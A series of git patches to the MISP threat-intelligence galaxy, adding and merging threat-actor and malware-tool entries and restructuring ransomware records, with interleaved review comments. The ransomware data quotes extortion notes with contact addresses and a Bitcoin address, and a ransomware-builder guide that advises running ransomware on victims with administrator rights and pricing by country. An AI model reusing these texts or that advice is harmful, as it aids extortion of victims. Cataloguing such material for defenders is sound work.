"tactics:Expansion", + "tactics:Actions on Intent" ] }, "uuid": "fe65c7ed-7129-4591-a82e-a223b0cdbf14", 
@@ -340,16 +341,6 @@ "uuid": "ae6eb93b-503f-49b5-98db-3f282551facb", "value": "O365 - MailSniper: Search Mailbox for content" }, - { - "description": "O365 - Search for Content with eDiscovery", - "meta": { - "kill_chain": [ - "tactics:Actions on Intent" - ] - }, - "uuid": "8ac66795-5e59-4993-973b-b6efd78fb1c8", - "value": "O365 - Search for Content with eDiscovery" - }, { "description": "O365 - Exfiltration email using EWS APIs with PowerShell", "meta": { @@ -371,5 +362,5 @@ "value": "O365 - Download documents and email" } ], - "version": 1 + "version": 2 } From 2c3424b331d193f3c3394f0989c8f95a16e5b1b6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rapha=C3=ABl=20Vinot?= Date: Mon, 13 May 2019 11:27:39 +0200 Subject: [PATCH 43/50] chg: Add PyMISPGalaxies test --- .travis.yml | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/.travis.yml b/.travis.yml index c413fe7..cd40f33 100644 --- a/.travis.yml +++ b/.travis.yml @@ -3,14 +3,27 @@ language: python cache: pip python: - - "3.6" + - "3.6-dev" + - "3.7-dev" sudo: required install: - sudo apt-get update -qq - sudo apt-get install -y -qq jq moreutils - - pip install jsonschema + - pip install jsonschema pipenv + - pushd .. + # Install PyMISPGalaxies + - git clone https://github.com/MISP/PyMISPGalaxies.git + - pushd PyMISPGalaxies + - git submodule update --init + - git submodule foreach git pull origin master + - pipenv install -d + - popd + - popd script: - ./validate_all.sh + - pushd ../PyMISPGalaxies + - pipenv run nosetests-3.4 --with-coverage --cover-package=pymispgalaxies -d + - popd From a20f7fbe918311f2e14e66fd15d75cea053d717c Mon Sep 17 00:00:00 2001 From: Daniel Plohmann Date: Wed, 15 May 2019 22:43:33 +0200 Subject: [PATCH 44/50] adding APT31/ZIRCONIUM --- clusters/threat-actor.json | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 99b0e6f..a903dae 100644 
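Review bot: `git submodule foreach git pull origin master` advances every PyMISPGalaxies submodule to upstream master at test time, so if one of those submodules is this repository (PyMISPGalaxies appears to load the galaxy JSON from a submodule, to be confirmed) the new test step exercises upstream master rather than the commit Travis checked out, and a broken cluster in the change under test would still pass. Replace the foreach line with a step that points the submodule at the checkout under test, e.g. `rm -rf <submodule-path> && ln -s "$TRAVIS_BUILD_DIR" <submodule-path>` after `git submodule update --init`, with the path taken from the PyMISPGalaxies tree. The unpinned clone plus `pull origin master` also makes the build non-reproducible and executes whatever is on those branches at run time; pinning PyMISPGalaxies to a tag or commit addresses both. `nosetests-3.4` is worth checking against the `3.6-dev`/`3.7-dev` interpreters this hunk switches to, as the versioned script name may not exist there.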
--- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -6709,7 +6709,24 @@ }, "uuid": "5059b44d-2753-4977-b987-4922f09afe6b", "value": "Silent Librarian" + }, + { + "description": "FireEye characterizes APT31 as an actor specialized on intellectual property theft, focusing on data and projects that make a particular organization competetive in its field. Based on available data (April 2016), FireEye assesses that APT31 conducts network operations at the behest of the Chinese Government.", + "meta": { + "country": "CN", + "refs": [ + "https://www.microsoft.com/security/blog/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/", + "https://duo.com/decipher/apt-groups-moving-down-the-supply-chain", + "https://github.com/GuardaCyber/APT-Groups-and-Operations/blob/master/Reports/FireEye%20Intel%20-%20APT31%20Threat%20Group%20Profile.pdf" + ], + "synonyms": [ + "APT 31", + "ZIRCONIUM" + ] + }, + "uuid": "6bf7e6b6-5917-45a6-9567-f0baba79768c", + "value": "APT31" } ], - "version": 109 + "version": 110 } From 9f801122dad666686a806887e6aef577cbcf94d1 Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 16 May 2019 15:45:03 +0200 Subject: [PATCH 45/50] add Reaver and probably related tools --- clusters/tool.json | 81 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 81 insertions(+) diff --git a/clusters/tool.json b/clusters/tool.json index bbf8b5c..c7917a5 100644 --- a/clusters/tool.json +++ b/clusters/tool.json 
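Review bot: `"country": "CN"` is given without an `attribution-confidence`, although the description itself hedges ("FireEye assesses"); the Pacifier entry elsewhere in this file pairs `country` with `"attribution-confidence": "50"`, so the same field belongs here, e.g. `"attribution-confidence": "50",` before `"country"`. "competetive" in the description should read "competitive". The third ref is a FireEye intel profile re-hosted in a personal GitHub repository; if the vendor has a canonical URL for it, cite that instead or in addition, since re-hosted copies disappear and cannot be verified against the publisher.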
@@ -7681,6 +7681,87 @@ }, "uuid": "5f0f6af2-b644-49a6-8f68-5d4ca58c989e", "value": "Scranos" + }, + { + "description": "Unit 42 has discovered a new malware family we’ve named “Reaver” with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010. The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-new-malware-with-ties-to-sunorcal-discovered/", + "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html" + ] + }, + "related": [ + { + "dest-uuid": "80365d3a-6d46-4195-a772-364749a6dc06", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + }, + { + "dest-uuid": "dd919e75-57e8-4e5c-9451-8be6e734f1f3", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + } + ], + "uuid": "22b75148-9d58-4fa7-8459-6ef25bbaf759", + "value": "Reaver" + }, + { + "description": "The Citizen Lab analyzed a malicious email sent to Tibetan organizations in June 2013. The email in question purported to be from a prominent member of the Tibetan community and repurposed content from a community mailing list. Attached to the email were what appeared to be three Microsoft Word documents (.doc), but which were trojaned with a malware family we call “Surtr”.1 All three attachments drop the exact same malware. 
We have seen the Surtr malware family used in attacks on Tibetan groups dating back to November 2012.", + "meta": { + "refs": [ + "https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/", + "https://otx.alienvault.com/pulse/588a7c8fe4166d1d84244b9a" + ] + }, + "related": [ + { + "dest-uuid": "22b75148-9d58-4fa7-8459-6ef25bbaf759", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + }, + { + "dest-uuid": "80365d3a-6d46-4195-a772-364749a6dc06", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + } + ], + "uuid": "dd919e75-57e8-4e5c-9451-8be6e734f1f3", + "value": "SURTR" + }, + { + "description": "SunOrcal is a trojan malware family whose activity dates back to at least 2013. A version discovered in November 2017 incorporates steganography techniques and can collect C2 information via GitHub, obscuring its C2 infrastructure and evading detection using the legitimate site for its first beacon. The threat actors have targeted users in the Vietnam area, spreading phishing emails containing malicious documents purportedly regarding South China Sea disputes. The new SunOrcal version has also been used with the recently discovered Reaver trojan and the original SunOrcal version. 
Some of the recent activity also incorporates the use of the Surtr malware.", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-sunorcal-adds-github-steganography-repertoire-expands-vietnam-myanmar/", + "https://www.cyber.nj.gov/threat-profiles/trojan-variants/sunorcal" + ] + }, + "related": [ + { + "dest-uuid": "22b75148-9d58-4fa7-8459-6ef25bbaf759", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + }, + { + "dest-uuid": "dd919e75-57e8-4e5c-9451-8be6e734f1f3", + "tags": [ + "estimative-language:likelihood-probability=\"roughly-even-chance\"" + ], + "type": "similar" + } + ], + "uuid": "80365d3a-6d46-4195-a772-364749a6dc06", + "value": "SunOrcal" } ], "version": 121 From 380006ecbb6ed49600ab750768072da8a24616e4 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Thu, 16 May 2019 23:57:49 +0530 Subject: [PATCH 46/50] merging Pacifier & Turla --- clusters/threat-actor.json | 23 +++++------------------ 1 file changed, 5 insertions(+), 18 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index a903dae..1ea5e19 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -2312,7 +2312,8 @@ "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://www.cfr.org/interactive/cyber-operations/turla", "https://www.bleepingcomputer.com/news/security/turla-outlook-backdoor-uses-clever-tactics-for-stealth-and-persistence/", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/" + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "http://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf" ], "synonyms": [ "Turla", 
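Review bot: `"version": 121` is left unchanged in the trailing context although three tool entries are added, while the other additions on this page bump the version in the same commit; if consumers use the version to detect updates, as those bumps suggest, instances already holding 121 will not import Reaver, SURTR or SunOrcal. The SURTR description also carries a stray footnote marker from the source page (`“Surtr”.1`), and all three descriptions are first-person vendor copy ("we’ve named", "we call"); trimming the marker and attributing the text ("Unit 42 describes Reaver as …") reads better in a shared galaxy. The `related` links are symmetric across the three entries, which is good; `"value": "SURTR"` against "Surtr" in the prose is a minor inconsistency worth settling, since `value` becomes the tag name.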
@@ -2326,7 +2327,9 @@
 "Pfinet",
 "TAG_0530",
 "KRYPTON",
- "Hippo Team"
+ "Hippo Team",
+ "Pacifier APT",
+ "Popeye"
 ]
 },
 "related": [
@@ -2988,22 +2991,6 @@
 "uuid": "bb446dc2-4fee-4212-8b2c-3ffa2917e338",
 "value": "ScarCruft"
 },
- {
- "description": "Bitdefender detected and blocked an ongoing cyber-espionage campaign against Romanian institutions and other foreign targets. The attacks started in 2014, with the latest reported occurrences in May of 2016. The APT, dubbed Pacifier by Bitdefender researchers, makes use of malicious .doc documents and .zip files distributed via spear phishing e-mail.",
- "meta": {
- "attribution-confidence": "50",
- "country": "RU",
- "refs": [
- "http://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf"
- ],
- "synonyms": [
- "Skipper",
- "Popeye"
- ]
- },
- "uuid": "32db3cc1-bb79-4b08-a7a4-747a37221afa",
- "value": "Pacifier APT"
- },
 {
 "description": "This group created a malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world. With the potential to sell access to these devices to the highest bidder",
 "meta": {
From 1cc0137c387904636f6ceb558f6515ad96b02ea3 Mon Sep 17 00:00:00 2001 From: Daniel Plohmann Date: Fri, 17 May 2019 17:36:57 +0200 Subject: [PATCH 47/50] adding TA542 to MUMMY SPIDER (emotet) --- clusters/threat-actor.json | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 1ea5e19..f8a872c 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
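Review bot: The `@@ -2988,22 +2991,6 @@` hunk deletes the Pacifier APT entry, but the synonyms added to Turla in the `@@ -2326,7 +2327,9 @@` hunk carry over only `Pacifier APT` and `Popeye` — the `Skipper` synonym the deleted entry had is dropped, so that name no longer resolves to any cluster; add `"Skipper",` next to `"Popeye"` in the Turla synonyms list. Removing the entry also retires uuid `32db3cc1-bb79-4b08-a7a4-747a37221afa`; any `related` dest-uuid elsewhere in this galaxy, or tags already applied in deployed instances, that reference it will presumably dangle, so either keep a stub entry that points at the Turla uuid or record the merge wherever such references are resolved. The deleted entry's `attribution-confidence` and `country` are not carried over here, which is fine only if Turla's own meta block (which starts outside the hunk) already states them.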
@@ -6378,7 +6378,11 @@
 "meta": {
 "refs": [
 "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/"
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service"
+ ],
+ "synonyms": [
+ "TA542"
 ]
 },
 "uuid": "c93281be-f6cd-4cd0-a5a3-defde9d77d8b",
From b4e4d2e539b7a2bc149a51511a6e84f235099b4e Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 23 May 2019 12:39:33 +0200 Subject: [PATCH 48/50] rework of ransomware galaxy --- clusters/ransomware.json | 1364 +++++++++++++++++++++++--------- 1 file changed, 825 insertions(+), 539 deletions(-)
diff --git a/clusters/ransomware.json b/clusters/ransomware.json
index 345a723..7ea0968 100644
--- a/clusters/ransomware.json
+++ b/clusters/ransomware.json
@@ -20,7 +20,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1(300$)",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-OkiR6pVmYUw/WMFiLGPuJhI/AAAAAAAAEME/wccYzFDIzJYWKXVxaTQeB4vM-4X6h3atgCLcB/s1600/note-nhtnwcuf.gif"
 ],
 "refs": [
@@ -40,7 +40,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "250 €",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-pSmSehFx0bI/WL8Rp7RoMHI/AAAAAAAAEKw/eyfsAjikl9sDHlcjdyQeRxZsLto4hxvGwCLcB/s1600/note-1-2.png"
 ],
 "refs": [
@@ -58,7 +58,7 @@
 "encryption": "AES-128",
 "payment-method": "Bitcoin",
 "price": "1",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-yTOgGw5v_vo/WMBUGHN7bnI/AAAAAAAAELY/8DDyxB4pSWgje_-iVbXgy2agNty1X6D6ACLcB/s1600/C6TUfkZWAAEewi_.jpg"
 ],
 "refs": [
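Review bot: The `ransomnotes-refs` key introduced in the `@@ -20,7 +20,7 @@` hunk (and `ransomnotes-filenames` in later hunks) is a new meta field, and nothing visible in this commit touches the galaxy's schema or bumps the cluster `version`; if the repository validates `clusters/*.json` against a schema that enumerates allowed meta keys, validation will reject these files until the schema is extended, and consumers keyed on the old `ransomnotes` field silently lose the screenshot references. Please confirm the schema change and the version bump are in the same commit (they would fall outside the part shown here). Splitting note text, dropped-file names and screenshot URLs into three typed lists is the right direction — one value type per key — so the per-entry migrations below should be checked against that rule.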
@@ -77,7 +77,7 @@
 "example:.encrypted.contact_here_me@india.com.enjey"
 ],
 "payment-method": "Bitcoin",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-rkOR4L9jDZc/WMG1uI6vqQI/AAAAAAAAEMk/SAu_FleTLHcagf_maS31xt3D_qnwAx2RQCLcB/s1600/note-enjey_2.png"
 ],
 "refs": [
@@ -94,7 +94,7 @@
 "meta": {
 "date": "March 2017",
 "encryption": "AES-128",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "DANGEROUS_RANSOM\nHacked.\nPlease contact\nhakermail@someting.com"
 ],
 "refs": [
@@ -137,7 +137,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0,0361312 (50$)",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-i4i0joM4qRk/WMO7sKLu4dI/AAAAAAAAENU/vLR4B1Xg39wduycHe2f0vEYSv_dtJ-gxwCLcB/s1600/note.jpg"
 ],
 "refs": [
@@ -215,7 +215,9 @@
 "payment-method": "MoneyPak",
 "price": "300$",
 "ransomnotes": [
- "(TRANSLATED BY THE SITE EDITOR) YOUR FILES HAVE BEEN LOCKED WITH A PASSWORD TO GET THE PASSWORD WRITE TO US AT project34@india.com WE WILL RESPOND TO YOU WITHIN 20 HOURS IN A MESSAGE, SPECIFY YOUR IP ADDRESS. YOU CAN FIND OUT AT 2IP.RU",
+ "(TRANSLATED BY THE SITE EDITOR) YOUR FILES HAVE BEEN LOCKED WITH A PASSWORD TO GET THE PASSWORD WRITE TO US AT project34@india.com WE WILL RESPOND TO YOU WITHIN 20 HOURS IN A MESSAGE, SPECIFY YOUR IP ADDRESS. YOU CAN FIND OUT AT 2IP.RU"
+ ],
+ "ransomnotes-filenames": [
 "ПАРОЛЬ.txt"
 ],
 "refs": [
@@ -232,7 +234,7 @@
 "encryption": "AES-128",
 "payment-method": "Bitcoin",
 "price": "300$",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-ZbWrN1LR-14/WMhPB7M8LBI/AAAAAAAAERQ/ZGG3RDHd8V0hwK_pf-vYChTn9VRpLBgNQCLcB/s1600/petya-based_ru_3.png"
 ],
 "refs": [
@@ -255,7 +257,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1.2683",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-OmuOKzLOHnw/WMl74fSSaJI/AAAAAAAAESg/4CsOYOSuUeEhsO4jSi6k10sbb_1NnfYxACLcB/s1600/lock-screen.jpg"
 ],
 "refs": [
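Review bot: In the `@@ -94,7 +94,7 @@` hunk the value `DANGEROUS_RANSOM\nHacked.\nPlease contact\nhakermail@someting.com` is moved under `ransomnotes-filenames`, but it is the note body (embedded newlines and a contact address), not a file name; keep it under `ransomnotes`, the way the `@@ -215,7 +215,9 @@` hunk on this same line keeps the `project34@india.com` text as a note and puts only `ПАРОЛЬ.txt` under `ransomnotes-filenames`. A consumer that turns `ransomnotes-filenames` into file-name indicators would otherwise emit a multi-line string that never appears on disk. Proposed line: `"ransomnotes": [ "DANGEROUS_RANSOM\nHacked.\nPlease contact\nhakermail@someting.com" ],` with no `ransomnotes-filenames` key until a reference names the dropped file.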
@@ -276,10 +278,14 @@
 ".REVENGE"
 ],
 "ransomnotes": [
- "https://2.bp.blogspot.com/-KkPVDxjy8tk/WM7LtYHmuAI/AAAAAAAAEUw/kDJghaq-j1AZuqjzqk2Fkxpp4yr9Yeb5wCLcB/s1600/revenge-note-2.jpg",
- "===ENGLISH=== All of your files were encrypted using REVENGE Ransomware. The action required to restore the files. Your files are not lost, they can be returned to their normal state by decoding them. The only way to do this is to get the software and your personal decryption key. Using any other software that claims to be able to recover your files will result in corrupted or destroyed files. You can purchase the software and the decryption key by sending us an email with your ID. And we send instructions for payment. After payment, you receive the software to return all files. For proof, we can decrypt one file for free. Attach it to an e-mail.",
+ "===ENGLISH=== All of your files were encrypted using REVENGE Ransomware. The action required to restore the files. Your files are not lost, they can be returned to their normal state by decoding them. The only way to do this is to get the software and your personal decryption key. Using any other software that claims to be able to recover your files will result in corrupted or destroyed files. You can purchase the software and the decryption key by sending us an email with your ID. And we send instructions for payment. After payment, you receive the software to return all files. For proof, we can decrypt one file for free. Attach it to an e-mail."
+ ],
+ "ransomnotes-filenames": [
 "# !!!HELP_FILE!!! #.txt"
 ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-KkPVDxjy8tk/WM7LtYHmuAI/AAAAAAAAEUw/kDJghaq-j1AZuqjzqk2Fkxpp4yr9Yeb5wCLcB/s1600/revenge-note-2.jpg"
+ ],
 "refs": [
 "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/",
 "https://id-ransomware.blogspot.co.il/2017/03/revenge-ransomware.html"
@@ -299,10 +305,14 @@
 "payment-method": "Bitcoin",
 "price": "150$",
 "ransomnotes": [
- "https://2.bp.blogspot.com/-ccU4txzjpWg/WMl33c7YD3I/AAAAAAAAESU/moLHgQnVMYstKuHKuNgWKz8VbNv5ECdzACLcB/s1600/lock-note.jpg",
- "FILES NUMBERED Your local drives, network folders, your external drives are encrypted using 256-bit encryption technology, this means your files are encrypted with a key. They cannot be opened without buying a decryption program and a private key, after the purchase, our program decrypts all your files and they will work like before. If you do not buy the program within 24 hours, then all your files will be permanently deleted. See the \"My Documents\" folder for more information in the file \"Beni Oku.txt\". Contact address: d3crypt0r@lelantos.org BTC address: 13hp68keuvogyjhvlf7xqmeox8dpr8odx5 You have to pay at BTC to the above address $ 150 Bitcoin You can do this by purchasing Bitcoinat www.localbitcoins.co Information: Using a computer recovery does not help. Antivirus scanning does not help to recover files, but can lead to loss.",
+ "FILES NUMBERED Your local drives, network folders, your external drives are encrypted using 256-bit encryption technology, this means your files are encrypted with a key. They cannot be opened without buying a decryption program and a private key, after the purchase, our program decrypts all your files and they will work like before. If you do not buy the program within 24 hours, then all your files will be permanently deleted. See the \"My Documents\" folder for more information in the file \"Beni Oku.txt\". Contact address: d3crypt0r@lelantos.org BTC address: 13hp68keuvogyjhvlf7xqmeox8dpr8odx5 You have to pay at BTC to the above address $ 150 Bitcoin You can do this by purchasing Bitcoinat www.localbitcoins.co Information: Using a computer recovery does not help. Antivirus scanning does not help to recover files, but can lead to loss." 
+ ],
+ "ransomnotes-filenames": [
 "Beni Oku.txt"
 ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-ccU4txzjpWg/WMl33c7YD3I/AAAAAAAAESU/moLHgQnVMYstKuHKuNgWKz8VbNv5ECdzACLcB/s1600/lock-note.jpg"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/03/turkish-fileencryptor.html",
 "https://twitter.com/JakubKroustek/status/842034887397908480"
@@ -356,10 +366,12 @@
 ".ZINO"
 ],
 "payment-method": "Bitcoin",
- "ransomnotes": [
- "https://4.bp.blogspot.com/-t1Q-a7sJlag/WMw8MBNIrkI/AAAAAAAAET4/aycY-m5GXVYQjcbZJ8N0kIfUZ3onYt8AgCLcB/s1600/note.jpg",
+ "ransomnotes-filenames": [
 "ZINO_NOTE.TXT"
 ],
+ "ransomnotes-refs": [
+ "https://4.bp.blogspot.com/-t1Q-a7sJlag/WMw8MBNIrkI/AAAAAAAAET4/aycY-m5GXVYQjcbZJ8N0kIfUZ3onYt8AgCLcB/s1600/note.jpg"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/03/zinocrypt-ransomware.html",
 "https://twitter.com/demonslay335?lang=en",
@@ -377,10 +389,12 @@
 "extensions": [
 ".crptxxx"
 ],
- "ransomnotes": [
- "https://2.bp.blogspot.com/-itq9nR2EedY/WM2OPtDKCgI/AAAAAAAAEUI/KcC8vtnmlHENz0CSOvxqoYeZL8qdx1IZgCLcB/s1600/note_2.png",
+ "ransomnotes-filenames": [
 "HOW_TO_FIX_!.txt"
 ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-itq9nR2EedY/WM2OPtDKCgI/AAAAAAAAEUI/KcC8vtnmlHENz0CSOvxqoYeZL8qdx1IZgCLcB/s1600/note_2.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/03/crptxxx-ransomware.html",
 "https://www.bleepingcomputer.com/forums/t/609690/ultracrypter-cryptxxx-ultradecrypter-ransomware-help-topic-crypt-cryp1/page-84",
@@ -400,10 +414,12 @@
 ],
 "payment-method": "Bitcoin",
 "price": "2",
- "ransomnotes": [
- "https://4.bp.blogspot.com/-suCNGXgzWuM/WM7HPujx_qI/AAAAAAAAEUk/gIvzbsbB_BUrBmmBsgpb_8w7zjwudu_mACLcB/s1600/note_2.png",
+ "ransomnotes-filenames": [
 "motd.txt"
 ],
+ "ransomnotes-refs": [
+ "https://4.bp.blogspot.com/-suCNGXgzWuM/WM7HPujx_qI/AAAAAAAAEUk/gIvzbsbB_BUrBmmBsgpb_8w7zjwudu_mACLcB/s1600/note_2.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/03/motd-ransomware.html",
 "https://www.bleepingcomputer.com/forums/t/642409/motd-of-ransome-hostage/",
@@ -423,7 +439,7 @@
 ],
 "payment-method": "Dollars",
 "price": "20 - 100",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-i5iUwC8XWDo/WM7dSVNQ8UI/AAAAAAAAEVY/uXmUErkLgHcWbfpdw1zGTvwY9DimiAH8wCLcB/s1600/lock-panel.jpg",
 "https://1.bp.blogspot.com/-9ovaMSUgtFQ/WM7dXo84tlI/AAAAAAAAEVc/_Zx9gZuvHA0tU9-jtzP492bXa5fQiL7kgCLcB/s1600/key-price.jpg"
 ],
@@ -445,7 +461,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.5",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-QuBYcLAKRPU/WLnE3Rn3MhI/AAAAAAAAEH4/WnC5Ke11j4MO7wmnfqBhtA-hpx6YN6TBgCLcB/s1600/note_2.png"
 ],
 "refs": [
@@ -464,7 +480,7 @@
 "extensions": [
 "[file_name.file_ext].id-[UserID]__contact_me_lock2017@protonmail.com_or_lock2017@unseen.is"
 ],
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-FllHGqIx_JQ/WL1QF2uMCCI/AAAAAAAAEJQ/Fn-8j2t8dwgSo8YTHM1iOkL-3U_hbcaKwCLcB/s1600/Note_2.png"
 ],
 "refs": [
@@ -549,7 +565,9 @@
 "payment-method": "Bitcoin",
 "price": "0.1",
 "ransomnotes": [
- "DotRansomware Setup Guide \nAttention!!! \nWe recommend you to build your ransomware inside virtual machine! (But it is safe to use builder on your PC, just don't run builded exe file on your PC!) \nRecommendation: If you have got possibility to run ransomware on victim's computer with administrator privileges then do it. Because it will provide better conversion. Recommended decryption price: 0.1 Recommended special decryption prices: FR|0.15|FI|0.15|IE|0.15|IS|0.15|AU|0.15|BE|0.15|CA|0.15|AT|0.15|DK|0.15|SE|0.15|DE|0.15|NL|0.15|SA|0.2|US|0.2|HK|0.2|LU|0.2|CH|0.2|NO|0.2|AE|0.2|SG|0.2|KW|0.2|MO|0.2|QA|0.2 Recommended attacked extensions: *** Recommendation: You need to test builded exe file inside virtual machine, because operability can be broken after crypt/pack of core! \nLinks to website: ***",
+ "DotRansomware Setup Guide \nAttention!!! \nWe recommend you to build your ransomware inside virtual machine! (But it is safe to use builder on your PC, just don't run builded exe file on your PC!) \nRecommendation: If you have got possibility to run ransomware on victim's computer with administrator privileges then do it. Because it will provide better conversion. Recommended decryption price: 0.1 Recommended special decryption prices: FR|0.15|FI|0.15|IE|0.15|IS|0.15|AU|0.15|BE|0.15|CA|0.15|AT|0.15|DK|0.15|SE|0.15|DE|0.15|NL|0.15|SA|0.2|US|0.2|HK|0.2|LU|0.2|CH|0.2|NO|0.2|AE|0.2|SG|0.2|KW|0.2|MO|0.2|QA|0.2 Recommended attacked extensions: *** Recommendation: You need to test builded exe file inside virtual machine, because operability can be broken after crypt/pack of core! \nLinks to website: ***"
+ ],
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-BoKI2-Lhsp8/WLHq34zCtdI/AAAAAAAAECo/YkfIG29vRRsLvdn51ctrMEypptRzZS2IgCLcB/s1600/raas.png"
 ],
 "refs": [
@@ -569,11 +587,13 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.01 - 0.06",
- "ransomnotes": [
- "https://4.bp.blogspot.com/-92aP_sumdLo/WLAy3D2kLvI/AAAAAAAAEAQ/FA1j--rOIygsNbDAWqrDqufT7zSwuEnvQCLcB/s1600/note-html_2.png",
- "https://3.bp.blogspot.com/-E1vV0sqaw2o/WLB1OvOLCPI/AAAAAAAAEAg/D4OkAOBT_uM4DeVS1hAu6eBGcmga8CSYwCLcB/s1600/site1.png",
+ "ransomnotes-filenames": [
 "ReadMe-[3_random_chars].html"
 ],
+ "ransomnotes-refs": [
+ "https://4.bp.blogspot.com/-92aP_sumdLo/WLAy3D2kLvI/AAAAAAAAEAQ/FA1j--rOIygsNbDAWqrDqufT7zSwuEnvQCLcB/s1600/note-html_2.png",
+ "https://3.bp.blogspot.com/-E1vV0sqaw2o/WLB1OvOLCPI/AAAAAAAAEAg/D4OkAOBT_uM4DeVS1hAu6eBGcmga8CSYwCLcB/s1600/site1.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/02/unlock26-ransomware.html",
 "https://www.bleepingcomputer.com/news/security/new-raas-portal-preparing-to-spread-unlock26-ransomware/"
@@ -592,7 +612,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "READ_ME_TO_DECRYPT.txt"
 ],
 "refs": [
@@ -652,10 +672,12 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1(50 - 165$)",
- "ransomnotes": [
- "https://www.bleepstatic.com/images/news/u/986406/Ransomware/TrumpLocker/TrumpLocker-wallpaper.jpg",
+ "ransomnotes-filenames": [
 "What happen to my files.txt"
 ],
+ "ransomnotes-refs": [
+ "https://www.bleepstatic.com/images/news/u/986406/Ransomware/TrumpLocker/TrumpLocker-wallpaper.jpg"
+ ],
 "refs": [
 "https://www.bleepingcomputer.com/news/security/new-trump-locker-ransomware-is-a-fraud-just-venuslocker-in-disguise/",
 "https://id-ransomware.blogspot.co.il/2017/02/trumplocker.html",
@@ -673,7 +695,7 @@
 "extensions": [
 ".damage"
 ],
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "TtWGgOd57SvPlkgZ***\n ==========\n end of secret_key \nTo restore your files - send e-mail to damage@india.com"
 ],
 "refs": [
